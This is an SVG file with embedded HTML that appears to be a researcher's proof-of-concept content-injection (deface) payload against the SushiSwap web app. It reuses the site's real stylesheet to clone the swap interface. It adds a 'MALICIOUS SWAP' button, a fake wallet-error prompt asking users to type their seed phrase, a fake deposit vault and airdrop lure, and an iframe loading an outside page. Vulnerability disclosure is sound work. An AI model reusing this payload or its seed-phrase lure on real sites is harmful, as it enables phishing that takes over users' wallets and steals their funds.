<svg width="960" height="850">
  <g transform="translate(300, 0) rotate(20)">
    <foreignObject x="10" y="10" width="800" height="800">
      <body xmlns="http://www.w3.org/1999/xhtml">
	  <style>
	  body{
	  font-family: DM Sans,ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji !important;
	  }
.button {
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}
.button1 {background-color: purple;;}
.button2 {background-color: rgb(18, 20, 20)}
#pic:focus{
    background-image: url("https://www.nicepng.com/png/detail/84-841204_evil-free-transparent-png-icon-evil.png") !important;)
	  background-size: 10px 10px !important;
  height: 800px;
 }
</style>
<link rel="preload" href="https://app.sushi.com/_next/static/css/1cc5d3485104136c.css" as="style"/><link rel="stylesheet" href="https://app.sushi.com/_next/static/css/1cc5d3485104136c.css" data-n-g="x"/>
<b style="font-size:21px;">Proof of Concept: (<xss style="color:navy !important">XSS/DEFACE/ABILITY TO HOST ANY CONTENT/SIGN TRANSACTIONS</xss>)<p></p> by <xss style="color:#9b111e !important">UNITED GLOBAL WHITEHAT SECURITY TEAM</xss> at UGWST.COM (security@ugwst.com)<p></p>Researchers: <xss style="color:#9b111e !important">René Kroka</xss> and <xss style="color:#9b111e !important">Jose C Almeida</xss></b><br></br>
<br></br>
<h1 style="margin: auto;width:50%; font-size: revert !important; font-weight: revert !important;"><b style="color:#9b111e !important">PHISHING WARNING:</b>
please make sure you're visiting<img src="https://www.pngall.com/wp-content/uploads/2/SSL-PNG-Free-Image.png" width="40px !important;" style="display:revert !important;"></img><xss style="color:purple !important">https://app.sushi.com</xss> - !CHECK THE URL!</h1>
<br></br><br></br><br></br>
<div class="relative filter drop-shadow z-10">
<div class="p-4 space-y-4 rounded bg-dark-900 z-1">
<div class="flex items-center justify-between mb-4 space-x-3">
<div class="grid grid-cols-3 rounded bg-dark-800 h-[46px]">
<a class="flex items-center justify-center px-4 text-base font-medium text-center rounded-md text-secondary hover:text-high-emphesis  font-bold border rounded text-high-emphesis border-dark-800 bg-gradient-to-r from-opaque-blue to-opaque-pink hover:from-blue hover:to-pink" href="/swap?inputCurrency=&amp;outputCurrency=0x6B3595068778DD592e39A122f4f5a5cF09C90fE2">
Swap</a>
<a class="flex items-center justify-center px-4 text-base font-medium text-center rounded-md text-secondary hover:text-high-emphesis" href="/limit-order">
Limit</a>
<a class="flex items-center justify-center px-4 text-base font-medium text-center rounded-md text-secondary hover:text-high-emphesis" href="/add/ETH/0x6B3595068778DD592e39A122f4f5a5cF09C90fE2">
Liquidity</a>
</div><div class="flex items-center">
<div class="grid grid-flow-col gap-1">
<div class="items-center hidden w-full h-full px-3 space-x-3 rounded cursor-pointer text-green text-opacity-80 hover:text-opacity-100 md:flex hover:bg-dark-800">
<svg width="18" height="20" viewBox="0 0 18 20" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M13.5215 0.618164L12.6818 1.57302L15.933 4.37393V13.2435C15.9114 13.6891 15.5239 14.0498 15.0502 14.0286C14.6196 14.0074 14.2751 13.6679 14.2536 13.2435V7.28093C14.2536 6.21998 13.3923 5.37122 12.3158 5.37122H11.8421V2.67641C11.8421 1.61546 10.9808 0.766697 9.90428 0.766697H1.93779C0.861242 0.766697 0 1.61546 0 2.67641V18.4421C0 18.9089 0.387559 19.2909 0.861242 19.2909H10.9808C11.4545 19.2909 11.8421 18.9089 11.8421 18.4421V6.64436H12.3158C12.6818 6.64436 12.9617 6.92021 12.9617 7.28093V13.2435C13.0048 14.4105 13.9737 15.3017 15.1579 15.2805C16.2775 15.2381 17.1818 14.3469 17.2248 13.2435V3.80102L13.5215 0.618164ZM9.66744 8.89358H2.17464V3.10079H9.66744V8.89358Z" fill="#7CFF6B">
</path></svg>
<div class="hidden md:block text-baseline">
<div>298</div></div></div>
<div class="relative flex items-center w-full h-full rounded hover:bg-dark-800">
<div class="flex items-center justify-center w-10 h-10 rounded-full cursor-pointer" id="headlessui-popover-button-4" aria-expanded="false">
<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" aria-hidden="true" class="w-[26px] h-[26px] transform rotate-90 hover:text-white">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10.325 4.317c.426-1.756 2.924-1.756 3.35 0a1.724 1.724 0 002.573 1.066c1.543-.94 3.31.826 2.37 2.37a1.724 1.724 0 001.065 2.572c1.756.426 1.756 2.924 0 3.35a1.724 1.724 0 00-1.066 2.573c.94 1.543-.826 3.31-2.37 2.37a1.724 1.724 0 00-2.572 1.065c-.426 1.756-2.924 1.756-3.35 0a1.724 1.724 0 00-2.573-1.066c-1.543.94-3.31-.826-2.37-2.37a1.724 1.724 0 00-1.065-2.572c-1.756-.426-1.756-2.924 0-3.35a1.724 1.724 0 001.066-2.573c-.94-1.543.826-3.31 2.37-2.37.996.608 2.296.07 2.572-1.065z">
</path><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M15 12a3 3 0 11-6 0 3 3 0 016 0z">
</path></svg></div></div></div></div></div><div>
<div id="swap-currency-input" class="p-5 rounded bg-dark-800">
<div class="flex flex-col justify-between space-y-3 sm:space-y-0 sm:flex-row">
<div class="w-full sm:w-2/5">
<button type="button" class="text-primary open-currency-select-button h-full outline-none select-none cursor-pointer border-none text-xl font-medium items-center">
<div class="flex">
<div class="flex items-center" style="">
<div class="rounded-full" style="width: 54px; height: 54px;">
<div class="overflow-hidden rounded" style="width: 54px; height: 54px;">
<span style="box-sizing: border-box; display: inline-block; overflow: hidden; width: 54px; height: 54px; background: none; opacity: 1; border: 0px; margin: 0px; padding: 0px; position: relative;">
<img alt="ETH" src="https://res.cloudinary.com/sushi-cdn/image/fetch/w_128,f_auto,q_auto/https://raw.githubusercontent.com/sushiswap/logos/main/token/eth.jpg" decoding="async" data-nimg="fixed" class="rounded-full" style="position: absolute; inset: 0px; box-sizing: border-box; padding: 0px; border: none; margin: auto; display: block; width: 0px; height: 0px; min-width: 100%; max-width: 100%; min-height: 100%; max-height: 100%;" srcset="https://res.cloudinary.com/sushi-cdn/image/fetch/w_64,f_auto,q_auto/https://raw.githubusercontent.com/sushiswap/logos/main/token/eth.jpg 1x, https://res.cloudinary.com/sushi-cdn/image/fetch/w_128,f_auto,q_auto/https://raw.githubusercontent.com/sushiswap/logos/main/token/eth.jpg 2x"></img>
</span></div></div></div><div class="flex flex-1 flex-col items-start justify-center mx-3.5">
<div class="text-xs font-medium text-secondary whitespace-nowrap">
Swap From:</div><div class="flex items-center">
<div class="text-lg font-bold token-symbol-container md:text-2xl">
ETH</div><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" aria-hidden="true" width="16" height="16" class="ml-2 stroke-current">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M19 9l-7 7-7-7">
</path></svg></div></div></div></button></div><div class="flex items-center w-full space-x-3 rounded bg-dark-900 focus:bg-dark-700 p-3 sm:w-3/5">
<input id="token-amount-input" inputmode="decimal" title="Token Amount" autocomplete="off" autocorrect="off" type="text" pattern="^[0-9]*[.,]?[0-9]*$" placeholder="0.0" min="0" minlength="1" maxlength="79" spellcheck="false" class="relative font-bold outline-none border-none flex-auto overflow-hidden overflow-ellipsis placeholder-low-emphesis focus:placeholder-primary w-0 p-0 text-2xl bg-transparent" value=""></input>
<div class="flex flex-col">
<div class="text-xs font-medium text-right cursor-pointer text-low-emphesis">
Balance: 0.002769 ETH</div><div class="flex justify-end space-x-1 text-xs font-medium text-right text-secondary">
</div></div></div></div></div><div class="grid py-3">
<div class="flex-start px-4 flex-wrap w-full flex">
<button class="z-10 -mt-6 -mb-6 rounded-full">
<div class="rounded-full bg-dark-900 p-3px">
<div class="p-3 rounded-full bg-dark-800 hover:bg-dark-700">
<div style="width: 32px; height: 32px;">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500" width="500" height="500" preserveAspectRatio="xMidYMid meet" style="width: 100%; height: 100%; transform: translate3d(0px, 0px, 0px); content-visibility: visible;">
<defs><clipPath id="__lottie_element_56">
<rect width="500" height="500" x="0" y="0">
</rect></clipPath><clipPath id="__lottie_element_58">
<path d="M0,0 L500,0 L500,500 L0,500z">
</path></clipPath></defs><g clip-path="url(#__lottie_element_56)">
<g transform="matrix(4.5,0,0,4.5,207.25,194.875)" opacity="1" style="display: block;">
<g opacity="1" transform="matrix(1,0,0,1,0,0)">
<path stroke-linecap="round" stroke-linejoin="round" fill-opacity="0" stroke="rgb(226,226,226)" stroke-opacity="1" stroke-width="5.6000000000000005" d=" M28.945999145507812,-27.937000274658203 C28.966999053955078,-9.605999946594238 29.014999389648438,33.75299835205078 29.034000396728516,50.236000061035156">
</path></g></g><g transform="matrix(3.1819803714752197,-3.1819803714752197,3.1819803714752197,3.1819803714752197,363.2012939453125,326.5682373046875)" opacity="1" style="display: block;">
<g opacity="1" transform="matrix(1,0,0,1,0,0)">
<path stroke-linecap="round" stroke-linejoin="round" fill-opacity="0" stroke="rgb(226,226,226)" stroke-opacity="1" stroke-width="5.6000000000000005" d=" M-20.548999786376953,-4.929999828338623 C-20.548999786376953,-4.929999828338623 -20.548999786376953,12.746999740600586 -20.548999786376953,12.746999740600586 C-20.548999786376953,12.746999740600586 -2.927000045776367,12.746999740600586 -2.927000045776367,12.746999740600586">
</path></g></g><g transform="matrix(-4.5,0,0,-4.5,292.75,305.125)" opacity="1" style="display: block;">
<g opacity="1" transform="matrix(1,0,0,1,0,0)">
<path stroke-linecap="round" stroke-linejoin="round" fill-opacity="0" stroke="rgb(226,226,226)" stroke-opacity="1" stroke-width="5.6000000000000005" d=" M28.945999145507812,-27.937000274658203 C28.966999053955078,-9.605999946594238 29.014999389648438,33.75299835205078 29.034000396728516,50.236000061035156">
</path></g></g><g transform="matrix(-3.1819803714752197,3.1819803714752197,-3.1819803714752197,-3.1819803714752197,136.79869079589844,173.43174743652344)" opacity="1" style="display: block;">
<g opacity="1" transform="matrix(1,0,0,1,0,0)">
<path stroke-linecap="round" stroke-linejoin="round" fill-opacity="0" stroke="rgb(226,226,226)" stroke-opacity="1" stroke-width="5.6000000000000005" d=" M-20.548999786376953,-4.929999828338623 C-20.548999786376953,-4.929999828338623 -20.548999786376953,12.746999740600586 -20.548999786376953,12.746999740600586 C-20.548999786376953,12.746999740600586 -2.927000045776367,12.746999740600586 -2.927000045776367,12.746999740600586">
</path></g></g><g clip-path="url(#__lottie_element_58)" transform="matrix(1,0,0,1,0,0)" opacity="1" style="display: block;">
</g></g></svg></div></div></div></button></div></div><div><div id="swap-currency-output" class="p-5 rounded bg-dark-800">
<div class="flex flex-col justify-between space-y-3 sm:space-y-0 sm:flex-row">
<div class="w-full sm:w-2/5">
<button type="button" class="text-primary open-currency-select-button h-full outline-none select-none cursor-pointer border-none text-xl font-medium items-center">
<div class="flex">
<div class="flex items-center" style="">
<div class="rounded-full" style="width: 54px; height: 54px;">
<div class="overflow-hidden rounded" style="width: 54px; height: 54px;">
<span style="box-sizing: border-box; display: inline-block; overflow: hidden; width: 54px; height: 54px; background: none; opacity: 1; border: 0px; margin: 0px; padding: 0px; position: relative;">
<img alt="SUSHI" src="https://res.cloudinary.com/sushi-cdn/image/fetch/w_128,f_auto,q_auto/https://raw.githubusercontent.com/sushiswap/icons/master/token/sushi.jpg" decoding="async" data-nimg="fixed" class="rounded-full" style="position: absolute; inset: 0px; box-sizing: border-box; padding: 0px; border: none; margin: auto; display: block; width: 0px; height: 0px; min-width: 100%; max-width: 100%; min-height: 100%; max-height: 100%;" srcset="https://res.cloudinary.com/sushi-cdn/image/fetch/w_64,f_auto,q_auto/https://raw.githubusercontent.com/sushiswap/icons/master/token/sushi.jpg 1x, https://res.cloudinary.com/sushi-cdn/image/fetch/w_128,f_auto,q_auto/https://raw.githubusercontent.com/sushiswap/icons/master/token/sushi.jpg 2x"></img>
</span></div></div></div><div class="flex flex-1 flex-col items-start justify-center mx-3.5">
<div class="text-xs font-medium text-secondary whitespace-nowrap">
Swap To (est.):</div><div class="flex items-center">
<div class="text-lg font-bold token-symbol-container md:text-2xl">
SUSHI</div><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" aria-hidden="true" width="16" height="16" class="ml-2 stroke-current">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M19 9l-7 7-7-7">
</path></svg></div></div></div></button></div><div class="flex items-center w-full space-x-3 rounded bg-dark-900 focus:bg-dark-700 p-3 sm:w-3/5">
<input id="token-amount-input" inputmode="decimal" title="Token Amount" autocomplete="off" autocorrect="off" type="text" pattern="^[0-9]*[.,]?[0-9]*$" placeholder="0.0" min="0" minlength="1" maxlength="79" spellcheck="false" class="relative font-bold outline-none border-none flex-auto overflow-hidden overflow-ellipsis placeholder-low-emphesis focus:placeholder-primary w-0 p-0 text-2xl bg-transparent" value=""></input>
<div class="flex flex-col">
<div class="text-xs font-medium text-right cursor-pointer text-low-emphesis">
Balance: 0 SUSHI</div><div class="flex justify-end space-x-1 text-xs font-medium text-right text-secondary">
</div></div></div></div></div></div></div><div class="mt-4">


<button tabindex="0" class="text-higher-emphesis hover:bg-gradient-to-b hover:from-black/20 focus:to-black/20 focus:bg-gradient-to-b focus:from-black/20 hover:to-black/20 active:bg-gradient-to-b active:from-black/40 active:to-black/40 disabled:pointer-events-none disabled:opacity-40 !bg-gradient-to-r from-blue to-pink-600 hover:from-blue/80 hover:to-pink-600/80 focus:from-blue/80 focus:to-pink-600/80 active:from-blue/70 active:to-pink-600/70 focus:border-blue-700 rounded px-4 h-[52px] w-full font-bold flex items-center justify-center gap-1" id="pic">
MALICIOUS SWAP</button>

</div></div><div class="flex flex-col justify-center">
<div class="relative h-[96px] mt-4">
</div></div></div>
<b>There was an error connecting your WEB3 Ethereum wallet please enter your seedphrase below:</b><br></br><textarea cols="85" rows="5"></textarea><p></p><input type="submit" value="Submit"></input>
<div style="text-align:right;"><b>Deposit into SECURED <xss style="color:purple !important"><img src="https://s2.coinmarketcap.com/static/img/coins/200x200/6758.png" width="20px !important;" style="display:revert !important;"></img>$SUSHI</xss> vault:</b><br></br><button class="button button1">Deposit</button>
<button class="button button2">Withdraw</button> </div>
 <h1 style="margin: auto;width:35%; font-size: revert !important; font-weight: revert !important;">FREE <xss style="color:purple !important"><img src="https://s2.coinmarketcap.com/static/img/coins/200x200/6758.png" width="30px !important;" style="display:revert !important;"></img>$SUSHI</xss> AIRDROP:</h1>
  <h1 style="margin: auto;width:50%;"><iframe scrolling="no" style="margin: auto;width:80%;" frameborder="none; display:block;" height="430px" src="https://renekroka.github.io/testc/index.html"></iframe></h1>
      </body>
    </foreignObject>
	</g>
	</svg>